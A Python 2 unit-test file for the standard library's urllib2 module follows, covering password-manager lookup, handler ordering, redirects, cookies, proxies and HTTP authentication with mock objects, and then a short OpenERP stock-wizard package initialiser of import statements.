r.get_header("spam-EggS") returns None, but that could be changed in
future.
>>> r.has_header("Not-there")
False
>>> print r.get_header("Not-there")
None
>>> r.get_header("Not-there", "default")
'default'
"""
def test_password_manager(self):
"""
>>> mgr = urllib2.HTTPPasswordMgr()
>>> add = mgr.add_password
>>> add("Some Realm", "http://example.com/", "joe", "password")
>>> add("Some Realm", "http://example.com/ni", "ni", "ni")
>>> add("c", "http://example.com/foo", "foo", "ni")
>>> add("c", "http://example.com/bar", "bar", "nini")
>>> add("b", "http://example.com/", "first", "blah")
>>> add("b", "http://example.com/", "second", "spam")
>>> add("a", "http://example.com", "1", "a")
>>> add("Some Realm", "http://c.example.com:3128", "3", "c")
>>> add("Some Realm", "d.example.com", "4", "d")
>>> add("Some Realm", "e.example.com:3128", "5", "e")
>>> mgr.find_user_password("Some Realm", "example.com")
('joe', 'password')
>>> mgr.find_user_password("Some Realm", "http://example.com")
('joe', 'password')
>>> mgr.find_user_password("Some Realm", "http://example.com/")
('joe', 'password')
>>> mgr.find_user_password("Some Realm", "http://example.com/spam")
('joe', 'password')
>>> mgr.find_user_password("Some Realm", "http://example.com/spam/spam")
('joe', 'password')
>>> mgr.find_user_password("c", "http://example.com/foo")
('foo', 'ni')
>>> mgr.find_user_password("c", "http://example.com/bar")
('bar', 'nini')
Actually, this is really undefined ATM
## Currently, we use the highest-level path where more than one match:
## >>> mgr.find_user_password("Some Realm", "http://example.com/ni")
## ('joe', 'password')
Use latest add_password() in case of conflict:
>>> mgr.find_user_password("b", "http://example.com/")
('second', 'spam')
No special relationship between a.example.com and example.com:
>>> mgr.find_user_password("a", "http://example.com/")
('1', 'a')
>>> mgr.find_user_password("a", "http://a.example.com/")
(None, None)
Ports:
>>> mgr.find_user_password("Some Realm", "c.example.com")
(None, None)
>>> mgr.find_user_password("Some Realm", "c.example.com:3128")
('3', 'c')
>>> mgr.find_user_password("Some Realm", "http://c.example.com:3128")
('3', 'c')
>>> mgr.find_user_password("Some Realm", "d.example.com")
('4', 'd')
>>> mgr.find_user_password("Some Realm", "e.example.com:3128")
('5', 'e')
"""
pass
def test_password_manager_default_port(self):
"""
>>> mgr = urllib2.HTTPPasswordMgr()
>>> add = mgr.add_password
The point to note here is that we can't guess the default port if there's
no scheme. This applies to both add_password and find_user_password.
>>> add("f", "http://g.example.com:80", "10", "j")
>>> add("g", "http://h.example.com", "11", "k")
>>> add("h", "i.example.com:80", "12", "l")
>>> add("i", "j.example.com", "13", "m")
>>> mgr.find_user_password("f", "g.example.com:100")
(None, None)
>>> mgr.find_user_password("f", "g.example.com:80")
('10', 'j')
>>> mgr.find_user_password("f", "g.example.com")
(None, None)
>>> mgr.find_user_password("f", "http://g.example.com:100")
(None, None)
>>> mgr.find_user_password("f", "http://g.example.com:80")
('10', 'j')
>>> mgr.find_user_password("f", "http://g.example.com")
('10', 'j')
>>> mgr.find_user_password("g", "h.example.com")
('11', 'k')
>>> mgr.find_user_password("g", "h.example.com:80")
('11', 'k')
>>> mgr.find_user_password("g", "http://h.example.com:80")
('11', 'k')
>>> mgr.find_user_password("h", "i.example.com")
(None, None)
>>> mgr.find_user_password("h", "i.example.com:80")
('12', 'l')
>>> mgr.find_user_password("h", "http://i.example.com:80")
('12', 'l')
>>> mgr.find_user_password("i", "j.example.com")
('13', 'm')
>>> mgr.find_user_password("i", "j.example.com:80")
(None, None)
>>> mgr.find_user_password("i", "http://j.example.com")
('13', 'm')
>>> mgr.find_user_password("i", "http://j.example.com:80")
(None, None)
"""
class MockOpener:
addheaders = []
def open(self, req, data=None):
self.req, self.data = req, data
def error(self, proto, *args):
self.proto, self.args = proto, args
class MockFile:
def read(self, count=None): pass
def readline(self, count=None): pass
def close(self): pass
class MockHeaders(dict):
def getheaders(self, name):
return self.values()
class MockResponse(StringIO.StringIO):
def __init__(self, code, msg, headers, data, url=None):
StringIO.StringIO.__init__(self, data)
self.code, self.msg, self.headers, self.url = code, msg, headers, url
def info(self):
return self.headers
def geturl(self):
return self.url
class MockCookieJar:
def add_cookie_header(self, request):
self.ach_req = request
def extract_cookies(self, response, request):
self.ec_req, self.ec_r = request, response
class FakeMethod:
def __init__(self, meth_name, action, handle):
self.meth_name = meth_name
self.handle = handle
self.action = action
def __call__(self, *args):
return self.handle(self.meth_name, self.action, *args)
class MockHandler:
# useful for testing handler machinery
# see add_ordered_mock_handlers() docstring
handler_order = 500
def __init__(self, methods):
self._define_methods(methods)
def _define_methods(self, methods):
for spec in methods:
if len(spec) == 2: name, action = spec
else: name, action = spec, None
meth = FakeMethod(name, action, self.handle)
setattr(self.__class__, name, meth)
def handle(self, fn_name, action, *args, **kwds):
self.parent.calls.append((self, fn_name, args, kwds))
if action is None:
return None
elif action == "return self":
return self
elif action == "return response":
res = MockResponse(200, "OK", {}, "")
return res
elif action == "return request":
return Request("http://blah/")
elif action.startswith("error"):
code = action[action.rfind(" ")+1:]
try:
code = int(code)
except ValueError:
pass
res = MockResponse(200, "OK", {}, "")
return self.parent.error("http", args[0], res, code, "", {})
elif action == "raise":
raise urllib2.URLError("blah")
assert False
def close(self): pass
def add_parent(self, parent):
self.parent = parent
self.parent.calls = []
def __lt__(self, other):
if not hasattr(other, "handler_order"):
# No handler_order, leave in original order. Yuck.
return True
return self.handler_order < other.handler_order
def add_ordered_mock_handlers(opener, meth_spec):
"""Create MockHandlers and add them to an OpenerDirector.
meth_spec: list of lists of tuples and strings defining methods to define
on handlers. eg:
[["http_error", "ftp_open"], ["http_open"]]
defines methods .http_error() and .ftp_open() on one handler, and
.http_open() on another. These methods just record their arguments and
return None. Using a tuple instead of a string causes the method to
perform some action (see MockHandler.handle()), eg:
[["http_error"], [("http_open", "return request")]]
defines .http_error() on one handler (which simply returns None), and
.http_open() on another handler, which returns a Request object.
"""
handlers = []
count = 0
for meths in meth_spec:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order += count
h.add_parent(opener)
count = count + 1
handlers.append(h)
opener.add_handler(h)
return handlers
def build_test_opener(*handler_instances):
opener = OpenerDirector()
for h in handler_instances:
opener.add_handler(h)
return opener
class MockHTTPHandler(urllib2.BaseHandler):
# useful for testing redirections and auth
# sends supplied headers and code as first response
# sends 200 OK as second response
def __init__(self, code, headers):
self.code = code
self.headers = headers
self.reset()
def reset(self):
self._count = 0
self.requests = []
def http_open(self, req):
import mimetools, httplib, copy
from StringIO import StringIO
self.requests.append(copy.deepcopy(req))
if self._count == 0:
self._count = self._count + 1
name = httplib.responses[self.code]
msg = mimetools.Message(StringIO(self.headers))
return self.parent.error(
"http", req, MockFile(), self.code, name, msg)
else:
self.req = req
msg = mimetools.Message(StringIO("\r\n\r\n"))
return MockResponse(200, "OK", msg, "", req.get_full_url())
class MockPasswordManager:
def add_password(self, realm, uri, user, password):
self.realm = realm
self.url = uri
self.user = user
self.password = password
def find_user_password(self, realm, authuri):
self.target_realm = realm
self.target_url = authuri
return self.user, self.password
class OpenerDirectorTests(unittest.TestCase):
def test_add_non_handler(self):
class NonHandler(object):
pass
self.assertRaises(TypeError,
OpenerDirector().add_handler, NonHandler())
def test_badly_named_methods(self):
# test work-around for three methods that accidentally follow the
# naming conventions for handler methods
# (*_open() / *_request() / *_response())
# These used to call the accidentally-named methods, causing a
# TypeError in real code; here, returning self from these mock
# methods would either cause no exception, or AttributeError.
from urllib2 import URLError
o = OpenerDirector()
meth_spec = [
[("do_open", "return self"), ("proxy_open", "return self")],
[("redirect_request", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
o.add_handler(urllib2.UnknownHandler())
for scheme in "do", "proxy", "redirect":
self.assertRaises(URLError, o.open, scheme+"://example.com/")
def test_handled(self):
# handler returning non-None means no more handlers will be called
o = OpenerDirector()
meth_spec = [
["http_open", "ftp_open", "http_error_302"],
["ftp_open"],
[("http_open", "return self")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
r = o.open(req)
# Second .http_open() gets called, third doesn't, since second returned
# non-None. Handlers without .http_open() never get any methods called
# on them.
# In fact, second mock handler defining .http_open() returns self
# (instead of response), which becomes the OpenerDirector's return
# value.
self.assertEqual(r, handlers[2])
calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
for expected, got in zip(calls, o.calls):
handler, name, args, kwds = got
self.assertEqual((handler, name), expected)
self.assertEqual(args, (req,))
def test_handler_order(self):
o = OpenerDirector()
handlers = []
for meths, handler_order in [
([("http_open", "return self")], 500),
(["http_open"], 0),
]:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order = handler_order
handlers.append(h)
o.add_handler(h)
r = o.open("http://example.com/")
# handlers called in reverse order, thanks to their sort order
self.assertEqual(o.calls[0][0], handlers[1])
self.assertEqual(o.calls[1][0], handlers[0])
def test_raise(self):
# raising URLError stops processing of request
o = OpenerDirector()
meth_spec = [
[("http_open", "raise")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
self.assertRaises(urllib2.URLError, o.open, req)
self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])
## def test_error(self):
## # XXX this doesn't actually seem to be used in standard library,
## # but should really be tested anyway...
def test_http_error(self):
# XXX http_error_default
# http errors are a special case
o = OpenerDirector()
meth_spec = [
[("http_open", "error 302")],
[("http_error_400", "raise"), "http_open"],
[("http_error_302", "return response"), "http_error_303",
"http_error"],
[("http_error_302")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
class Unknown:
def __eq__(self, other): return True
req = Request("http://example.com/")
r = o.open(req)
assert len(o.calls) == 2
calls = [(handlers[0], "http_open", (req,)),
(handlers[2], "http_error_302",
(req, Unknown(), 302, "", {}))]
for expected, got in zip(calls, o.calls):
handler, method_name, args = expected
self.assertEqual((handler, method_name), got[:2])
self.assertEqual(args, got[2])
def test_processors(self):
# *_request / *_response methods get called appropriately
o = OpenerDirector()
meth_spec = [
[("http_request", "return request"),
("http_response", "return response")],
[("http_request", "return request"),
("http_response", "return response")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
r = o.open(req)
# processor methods are called on *all* handlers that define them,
# not just the first handler that handles the request
calls = [
(handlers[0], "http_request"), (handlers[1], "http_request"),
(handlers[0], "http_response"), (handlers[1], "http_response")]
for i, (handler, name, args, kwds) in enumerate(o.calls):
if i < 2:
# *_request
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 1)
self.assert_(isinstance(args[0], Request))
else:
# *_response
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 2)
self.assert_(isinstance(args[0], Request))
# response from opener.open is None, because there's no
# handler that defines http_open to handle it
self.assert_(args[1] is None or
isinstance(args[1], MockResponse))
def sanepathname2url(path):
import urllib
urlpath = urllib.pathname2url(path)
if os.name == "nt" and urlpath.startswith("///"):
urlpath = urlpath[2:]
# XXX don't ask me about the mac...
return urlpath
class HandlerTests(unittest.TestCase):
def test_ftp(self):
class MockFTPWrapper:
def __init__(self, data): self.data = data
def retrfile(self, filename, filetype):
self.filename, self.filetype = filename, filetype
return StringIO.StringIO(self.data), len(self.data)
class NullFTPHandler(urllib2.FTPHandler):
def __init__(self, data): self.data = data
def connect_ftp(self, user, passwd, host, port, dirs,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.user, self.passwd = user, passwd
self.host, self.port = host, port
self.dirs = dirs
self.ftpwrapper = MockFTPWrapper(self.data)
return self.ftpwrapper
import ftplib
data = "rheum rhaponicum"
h = NullFTPHandler(data)
o = h.parent = MockOpener()
for url, host, port, type_, dirs, filename, mimetype in [
("ftp://localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://localhost:80/foo/bar/",
"localhost", 80, "D",
["foo", "bar"], "", None),
("ftp://localhost/baz.gif;type=a",
"localhost", ftplib.FTP_PORT, "A",
[], "baz.gif", None), # XXX really this should guess image/gif
]:
req = Request(url)
req.timeout = None
r = h.ftp_open(req)
# ftp authentication not yet implemented by FTPHandler
self.assert_(h.user == h.passwd == "")
self.assertEqual(h.host, socket.gethostbyname(host))
self.assertEqual(h.port, port)
self.assertEqual(h.dirs, dirs)
self.assertEqual(h.ftpwrapper.filename, filename)
self.assertEqual(h.ftpwrapper.filetype, type_)
headers = r.info()
self.assertEqual(headers.get("Content-type"), mimetype)
self.assertEqual(int(headers["Content-length"]), len(data))
def test_file(self):
import rfc822, socket
h = urllib2.FileHandler()
o = h.parent = MockOpener()
TESTFN = test_support.TESTFN
urlpath = sanepathname2url(os.path.abspath(TESTFN))
towrite = "hello, world\n"
urls = [
"file://localhost%s" % urlpath,
"file://%s" % urlpath,
"file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
]
try:
localaddr = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
localaddr = ''
if localaddr:
urls.append("file://%s%s" % (localaddr, urlpath))
for url in urls:
f = open(TESTFN, "wb")
try:
try:
f.write(towrite)
finally:
f.close()
r = h.file_open(Request(url))
try:
data = r.read()
headers = r.info()
newurl = r.geturl()
finally:
r.close()
stats = os.stat(TESTFN)
modified = rfc822.formatdate(stats.st_mtime)
finally:
os.remove(TESTFN)
self.assertEqual(data, towrite)
self.assertEqual(headers["Content-type"], "text/plain")
self.assertEqual(headers["Content-length"], "13")
self.assertEqual(headers["Last-modified"], modified)
for url in [
"file://localhost:80%s" % urlpath,
"file:///file_does_not_exist.txt",
"file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
os.getcwd(), TESTFN),
"file://somerandomhost.ontheinternet.com%s/%s" %
(os.getcwd(), TESTFN),
]:
try:
f = open(TESTFN, "wb")
try:
f.write(towrite)
finally:
f.close()
self.assertRaises(urllib2.URLError,
h.file_open, Request(url))
finally:
os.remove(TESTFN)
h = urllib2.FileHandler()
o = h.parent = MockOpener()
# XXXX why does // mean ftp (and /// mean not ftp!), and where
# is file: scheme specified? I think this is really a bug, and
# what was intended was to distinguish between URLs like:
# file:/blah.txt (a file)
# file://localhost/blah.txt (a file)
# file:///blah.txt (a file)
# file://ftp.example.com/blah.txt (an ftp URL)
for url, ftp in [
("file://ftp.example.com//foo.txt", True),
("file://ftp.example.com///foo.txt", False),
# XXXX bug: fails with OSError, should be URLError
("file://ftp.example.com/foo.txt", False),
]:
req = Request(url)
try:
h.file_open(req)
# XXXX remove OSError when bug fixed
except (urllib2.URLError, OSError):
self.assert_(not ftp)
else:
self.assert_(o.req is req)
self.assertEqual(req.type, "ftp")
def test_http(self):
class MockHTTPResponse:
def __init__(self, fp, msg, status, reason):
self.fp = fp
self.msg = msg
self.status = status
self.reason = reason
def read(self):
return ''
class MockHTTPClass:
def __init__(self):
self.req_headers = []
self.data = None
self.raise_on_endheaders = False
def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.host = host
self.timeout = timeout
return self
def set_debuglevel(self, level):
self.level = level
def request(self, method, url, body=None, headers={}):
self.method = method
self.selector = url
self.req_headers += headers.items()
self.req_headers.sort()
if body:
self.data = body
if self.raise_on_endheaders:
import socket
raise socket.error()
def getresponse(self):
return MockHTTPResponse(MockFile(), {}, 200, "OK")
h = urllib2.AbstractHTTPHandler()
o = h.parent = MockOpener()
url = "http://example.com/"
for method, data in [("GET", None), ("POST", "blah")]:
req = Request(url, data, {"Foo": "bar"})
req.timeout = None
req.add_unredirected_header("Spam", "eggs")
http = MockHTTPClass()
r = h.do_open(http, req)
# result attributes
r.read; r.readline # wrapped MockFile methods
r.info; r.geturl # addinfourl methods
r.code, r.msg == 200, "OK" # added from MockHTTPClass.getreply()
hdrs = r.info()
hdrs.get; hdrs.has_key # r.info() gives dict from .getreply()
self.assertEqual(r.geturl(), url)
self.assertEqual(http.host, "example.com")
self.assertEqual(http.level, 0)
self.assertEqual(http.method, method)
self.assertEqual(http.selector, "/")
self.assertEqual(http.req_headers,
[("Connection", "close"),
("Foo", "bar"), ("Spam", "eggs")])
self.assertEqual(http.data, data)
# check socket.error converted to URLError
http.raise_on_endheaders = True
self.assertRaises(urllib2.URLError, h.do_open, http, req)
# check adding of standard headers
o.addheaders = [("Spam", "eggs")]
for data in "", None: # POST, GET
req = Request("http://example.com/", data)
r = MockResponse(200, "OK", {}, "")
newreq = h.do_request_(req)
if data is None: # GET
self.assert_("Content-length" not in req.unredirected_hdrs)
self.assert_("Content-type" not in req.unredirected_hdrs)
else: # POST
self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
self.assertEqual(req.unredirected_hdrs["Content-type"],
"application/x-www-form-urlencoded")
# XXX the details of Host could be better tested
self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")
# don't clobber existing headers
req.add_unredirected_header("Content-length", "foo")
req.add_unredirected_header("Content-type", "bar")
req.add_unredirected_header("Host", "baz")
req.add_unredirected_header("Spam", "foo")
newreq = h.do_request_(req)
self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
self.assertEqual(req.unredirected_hdrs["Host"], "baz")
self.assertEqual(req.unredirected_hdrs["Spam"], "foo")
def test_http_doubleslash(self):
# Checks that the presence of an unnecessary double slash in a url doesn't break anything
# Previously, a double slash directly after the host could cause incorrect parsing of the url
h = urllib2.AbstractHTTPHandler()
o = h.parent = MockOpener()
data = ""
ds_urls = [
"http://example.com/foo/bar/baz.html",
"http://example.com//foo/bar/baz.html",
"http://example.com/foo//bar/baz.html",
"http://example.com/foo/bar//baz.html",
]
for ds_url in ds_urls:
ds_req = Request(ds_url, data)
# Check whether host is determined correctly if there is no proxy
np_ds_req = h.do_request_(ds_req)
self.assertEqual(np_ds_req.unredirected_hdrs["Host"],"example.com")
# Check whether host is determined correctly if there is a proxy
ds_req.set_proxy("someproxy:3128",None)
p_ds_req = h.do_request_(ds_req)
self.assertEqual(p_ds_req.unredirected_hdrs["Host"],"example.com")
def test_errors(self):
h = urllib2.HTTPErrorProcessor()
o = h.parent = MockOpener()
url = "http://example.com/"
req = Request(url)
# all 2xx are passed through
r = MockResponse(200, "OK", {}, "", url)
newr = h.http_response(req, r)
self.assert_(r is newr)
self.assert_(not hasattr(o, "proto")) # o.error not called
r = MockResponse(202, "Accepted", {}, "", url)
newr = h.http_response(req, r)
self.assert_(r is newr)
self.assert_(not hasattr(o, "proto")) # o.error not called
r = MockResponse(206, "Partial content", {}, "", url)
newr = h.http_response(req, r)
self.assert_(r is newr)
self.assert_(not hasattr(o, "proto")) # o.error not called
# anything else calls o.error (and MockOpener returns None, here)
r = MockResponse(502, "Bad gateway", {}, "", url)
self.assert_(h.http_response(req, r) is None)
self.assertEqual(o.proto, "http") # o.error called
self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))
def test_cookies(self):
cj = MockCookieJar()
h = urllib2.HTTPCookieProcessor(cj)
o = h.parent = MockOpener()
req = Request("http://example.com/")
r = MockResponse(200, "OK", {}, "")
newreq = h.http_request(req)
self.assert_(cj.ach_req is req is newreq)
self.assertEquals(req.get_origin_req_host(), "example.com")
self.assert_(not req.is_unverifiable())
newr = h.http_response(req, r)
self.assert_(cj.ec_req is req)
self.assert_(cj.ec_r is r is newr)
def test_redirect(self):
from_url = "http://example.com/a.html"
to_url = "http://example.com/b.html"
h = urllib2.HTTPRedirectHandler()
o = h.parent = MockOpener()
# ordinary redirect behaviour
for code in 301, 302, 303, 307:
for data in None, "blah\nblah\n":
method = getattr(h, "http_error_%s" % code)
req = Request(from_url, data)
req.add_header("Nonsense", "viking=withhold")
if data is not None:
req.add_header("Content-Length", str(len(data)))
req.add_unredirected_header("Spam", "spam")
try:
method(req, MockFile(), code, "Blah",
MockHeaders({"location": to_url}))
except urllib2.HTTPError:
# 307 in response to POST requires user OK
self.assert_(code == 307 and data is not None)
self.assertEqual(o.req.get_full_url(), to_url)
try:
self.assertEqual(o.req.get_method(), "GET")
except AttributeError:
self.assert_(not o.req.has_data())
# now it's a GET, there should not be headers regarding content
# (possibly dragged from before being a POST)
headers = [x.lower() for x in o.req.headers]
self.assertTrue("content-length" not in headers)
self.assertTrue("content-type" not in headers)
self.assertEqual(o.req.headers["Nonsense"],
"viking=withhold")
self.assert_("Spam" not in o.req.headers)
self.assert_("Spam" not in o.req.unredirected_hdrs)
# loop detection
req = Request(from_url)
def redirect(h, req, url=to_url):
h.http_error_302(req, MockFile(), 302, "Blah",
MockHeaders({"location": url}))
# Note that the *original* request shares the same record of
# redirections with the sub-requests caused by the redirections.
# detect infinite loop redirect of a URL to itself
req = Request(from_url, origin_req_host="example.com")
count = 0
try:
while 1:
redirect(h, req, "http://example.com/")
count = count + 1
except urllib2.HTTPError:
# don't stop until max_repeats, because cookies may introduce state
self.assertEqual(count, urllib2.HTTPRedirectHandler.max_repeats)
# detect endless non-repeating chain of redirects
req = Request(from_url, origin_req_host="example.com")
count = 0
try:
while 1:
redirect(h, req, "http://example.com/%d" % count)
count = count + 1
except urllib2.HTTPError:
self.assertEqual(count,
urllib2.HTTPRedirectHandler.max_redirections)
def test_cookie_redirect(self):
# cookies shouldn't leak into redirected requests
from cookielib import CookieJar
from test.test_cookielib import interact_netscape
cj = CookieJar()
interact_netscape(cj, "http://www.example.com/", "spam=eggs")
hh = MockHTTPHandler(302, "Location: http://www.cracker.com/\r\n\r\n")
hdeh = urllib2.HTTPDefaultErrorHandler()
hrh = urllib2.HTTPRedirectHandler()
cp = urllib2.HTTPCookieProcessor(cj)
o = build_test_opener(hh, hdeh, hrh, cp)
o.open("http://www.example.com/")
self.assert_(not hh.req.has_header("Cookie"))
def test_proxy(self):
o = OpenerDirector()
ph = urllib2.ProxyHandler(dict(http="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("http_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://acme.example.com/")
self.assertEqual(req.get_host(), "acme.example.com")
r = o.open(req)
self.assertEqual(req.get_host(), "proxy.example.com:3128")
self.assertEqual([(handlers[0], "http_open")],
[tup[0:2] for tup in o.calls])
def test_basic_auth(self, quote_char='"'):
opener = OpenerDirector()
password_manager = MockPasswordManager()
auth_handler = urllib2.HTTPBasicAuthHandler(password_manager)
realm = "ACME Widget Store"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
(quote_char, realm, quote_char) )
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
def test_basic_auth_with_single_quoted_realm(self):
self.test_basic_auth(quote_char="'")
def test_proxy_basic_auth(self):
opener = OpenerDirector()
ph = urllib2.ProxyHandler(dict(http="proxy.example.com:3128"))
opener.add_handler(ph)
password_manager = MockPasswordManager()
auth_handler = urllib2.ProxyBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
realm, http_handler, password_manager,
"http://acme.example.com:3128/protected",
"proxy.example.com:3128",
)
def test_basic_and_digest_auth_handlers(self):
# HTTPDigestAuthHandler threw an exception if it couldn't handle a 40*
# response (http://python.org/sf/1479302), where it should instead
# return None to allow another handler (especially
# HTTPBasicAuthHandler) to handle the response.
# Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
# try digest first (since it's the strongest auth scheme), so we record
# order of calls here to check digest comes first:
class RecordingOpenerDirector(OpenerDirector):
def __init__(self):
OpenerDirector.__init__(self)
self.recorded = []
def record(self, info):
self.recorded.append(info)
class TestDigestAuthHandler(urllib2.HTTPDigestAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("digest")
urllib2.HTTPDigestAuthHandler.http_error_401(self,
*args, **kwds)
class TestBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("basic")
urllib2.HTTPBasicAuthHandler.http_error_401(self,
*args, **kwds)
opener = RecordingOpenerDirector()
password_manager = MockPasswordManager()
digest_handler = TestDigestAuthHandler(password_manager)
basic_handler = TestBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(basic_handler)
opener.add_handler(digest_handler)
opener.add_handler(http_handler)
# check basic auth isn't blocked by digest handler failing
self._test_basic_auth(opener, basic_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
# check digest was tried before basic (twice, because
# _test_basic_auth called .open() twice)
self.assertEqual(opener.recorded, ["digest", "basic"]*2)
def _test_basic_auth(self, opener, auth_handler, auth_header,
realm, http_handler, password_manager,
request_url, protected_url):
import base64
user, password = "wile", "coyote"
# .add_password() fed through to password manager
auth_handler.add_password(realm, request_url, user, password)
self.assertEqual(realm, password_manager.realm)
self.assertEqual(request_url, password_manager.url)
self.assertEqual(user, password_manager.user)
self.assertEqual(password, password_manager.password)
r = opener.open(request_url)
# should have asked the password manager for the username/password
self.assertEqual(password_manager.target_realm, realm)
self.assertEqual(password_manager.target_url, protected_url)
# expect one request without authorization, then one with
self.assertEqual(len(http_handler.requests), 2)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
userpass = '%s:%s' % (user, password)
auth_hdr_value = 'Basic '+base64.encodestring(userpass).strip()
self.assertEqual(http_handler.requests[1].get_header(auth_header),
auth_hdr_value)
# if the password manager can't find a password, the handler won't
# handle the HTTP auth error
password_manager.user = password_manager.password = None
http_handler.reset()
r = opener.open(request_url)
self.assertEqual(len(http_handler.requests), 1)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
class MiscTests(unittest.TestCase):
def test_build_opener(self):
class MyHTTPHandler(urllib2.HTTPHandler): pass
class FooHandler(urllib2.BaseHandler):
def foo_open(self): pass
class BarHandler(urllib2.BaseHandler):
def bar_open(self): pass
build_opener = urllib2.build_opener
o = build_opener(FooHandler, BarHandler)
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# can take a mix of classes and instances
o = build_opener(FooHandler, BarHandler())
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# subclasses of default handlers override default handlers
o = build_opener(MyHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
# a particular case of overriding: default handlers can be passed
# in explicitly
o = build_opener()
self.opener_has_handler(o, urllib2.HTTPHandler)
o = build_opener(urllib2.HTTPHandler)
self.opener_has_handler(o, urllib2.HTTPHandler)
o = build_opener(urllib2.HTTPHandler())
self.opener_has_handler(o, urllib2.HTTPHandler)
# Issue2670: multiple handlers sharing the same base class
class MyOtherHTTPHandler(urllib2.HTTPHandler): pass
o = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
self.opener_has_handler(o, MyOtherHTTPHandler)
def opener_has_handler(self, opener, handler_class):
for h in opener.handlers:
if h.__class__ == handler_class:
break
else:
self.assert_(False)
class RequestTests(unittest.TestCase):
def setUp(self):
self.get = urllib2.Request("http://www.python.org/~jeremy/")
self.post = urllib2.Request("http://www.python.org/~jeremy/",
"data",
headers={"X-Test": "test"})
def test_method(self):
self.assertEqual("POST", self.post.get_method())
self.assertEqual("GET", self.get.get_method())
def test_add_data(self):
self.assert_(not self.get.has_data())
self.assertEqual("GET", self.get.get_method())
self.get.add_data("spam")
self.assert_(self.get.has_data())
self.assertEqual("POST", self.get.get_method())
def test_get_full_url(self):
self.assertEqual("http://www.python.org/~jeremy/",
self.get.get_full_url())
def test_selector(self):
self.assertEqual("/~jeremy/", self.get.get_selector())
req = urllib2.Request("http://www.python.org/")
self.assertEqual("/", req.get_selector())
def test_get_type(self):
self.assertEqual("http", self.get.get_type())
def test_get_host(self):
self.assertEqual("www.python.org", self.get.get_host())
def test_get_host_unquote(self):
req = urllib2.Request("http://www.%70ython.org/")
self.assertEqual("www.python.org", req.get_host())
def test_proxy(self):
self.assert_(not self.get.has_proxy())
self.get.set_proxy("www.perl.org", "http")
self.assert_(self.get.has_proxy())
self.assertEqual("www.python.org", self.get.get_origin_req_host())
self.assertEqual("www.perl.org", self.get.get_host())
def test_main(verbose=None):
from test import test_urllib2
test_support.run_doctest(test_urllib2, verbose)
test_support.run_doctest(urllib2, verbose)
tests = (TrivialTests,
OpenerDirectorTests,
HandlerTests,
MiscTests,
RequestTests)
test_support.run_unittest(*tests)
if __name__ == "__main__":
test_main(verbose=True)
| apache-2.0 |
quanvm009/codev7 | openerp/addons/stock/wizard/__init__.py | 73 | 1416 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_traceability
import stock_move
import stock_splitinto
import stock_partial_picking
import stock_partial_move
import stock_inventory_merge
import stock_fill_inventory
import stock_inventory_line_split
import stock_invoice_onshipping
import stock_location_product
import stock_change_standard_price
import stock_return_picking
import stock_change_product_qty
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
